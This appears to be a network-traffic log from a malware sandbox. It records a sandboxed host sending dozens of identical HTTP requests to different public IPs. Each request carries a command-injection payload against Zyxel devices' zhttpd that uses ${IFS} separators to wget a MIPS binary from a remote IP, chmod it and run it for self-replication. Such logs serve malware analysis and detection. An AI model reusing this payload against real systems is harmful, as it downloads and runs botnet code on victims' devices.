                                                Jan 12, 2024 18:24:54.314640045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9197192.168.2.1338398138.11.120.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314692974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9198192.168.2.134595657.77.173.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314780951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9199192.168.2.1357520111.70.17.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314846039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9200192.168.2.135525235.203.111.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314908028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9201192.168.2.135369479.115.102.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.314973116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9202192.168.2.134708231.128.45.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315011024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9203192.168.2.1340414146.136.37.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315068007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9204192.168.2.134783286.112.52.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315123081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9205192.168.2.134123648.115.142.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315185070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9206192.168.2.1347624212.230.117.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315320015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9207192.168.2.1348120176.246.64.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315347910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9208192.168.2.1356052162.99.187.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315421104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9209192.168.2.135446665.89.171.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315480947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9210192.168.2.135244294.171.45.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315496922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9211192.168.2.1350474131.53.247.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315552950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9212192.168.2.1355020193.200.252.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315607071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9213192.168.2.134879849.204.90.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315675974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9214192.168.2.1339334172.11.42.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315732002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9215192.168.2.1339830164.107.36.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315784931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9216192.168.2.133304253.92.14.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315853119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9217192.168.2.1350256163.130.242.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315884113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9218192.168.2.1357562164.233.36.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315933943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9219192.168.2.135249494.165.160.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.315978050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9220192.168.2.134883258.52.197.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316018105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9221192.168.2.1343614120.176.252.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316077948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9222192.168.2.133434274.182.140.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316135883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9223192.168.2.134134440.42.248.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316196918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9224192.168.2.1359466200.22.184.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316263914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9225192.168.2.133591459.118.48.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316323042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9226192.168.2.133453891.83.157.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316406012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9227192.168.2.1352798137.53.159.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316457033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9228192.168.2.1353292138.202.20.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316508055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9229192.168.2.1358178116.104.132.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316581011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9230192.168.2.1346710160.224.91.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316628933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9231192.168.2.134285417.106.63.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316673040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9232192.168.2.1345158106.184.239.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316735029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9233192.168.2.1356748176.31.157.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316771030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9234192.168.2.1350966148.177.39.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316822052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9235192.168.2.1348650160.37.8.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316889048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9236192.168.2.13480365.107.0.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.316942930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9237192.168.2.1353394120.153.156.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.317014933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9238192.168.2.133435650.128.157.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.317039013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9239192.168.2.133930665.80.65.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.317121983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9240192.168.2.1352640204.161.188.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.317202091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9241192.168.2.1356438107.124.218.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.317245960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9242192.168.2.1332800179.205.39.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.317277908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9243192.168.2.1356196174.53.41.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.317336082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9244192.168.2.134912096.40.164.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.322164059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9245192.168.2.13583965.153.208.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.322191954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9246192.168.2.1334368135.221.130.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.322263956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9247192.168.2.133462212.96.156.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.322310925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9248192.168.2.1341802177.6.202.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.322381020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9249192.168.2.1336212220.131.227.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.322427988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9250192.168.2.1356460121.64.209.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.322490931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9251192.168.2.1349366190.16.217.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331381083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9252192.168.2.1339978178.18.233.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331423044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9253192.168.2.1340124134.106.227.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331464052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9254192.168.2.1357148141.17.125.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331502914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9255192.168.2.1348262161.187.245.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331547976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9256192.168.2.136029285.34.123.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331610918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9257192.168.2.135975297.207.111.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331650019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9258192.168.2.135841050.128.45.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331697941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9259192.168.2.1335408217.196.167.235443
                                                TimestampBytes transferredDirectionData
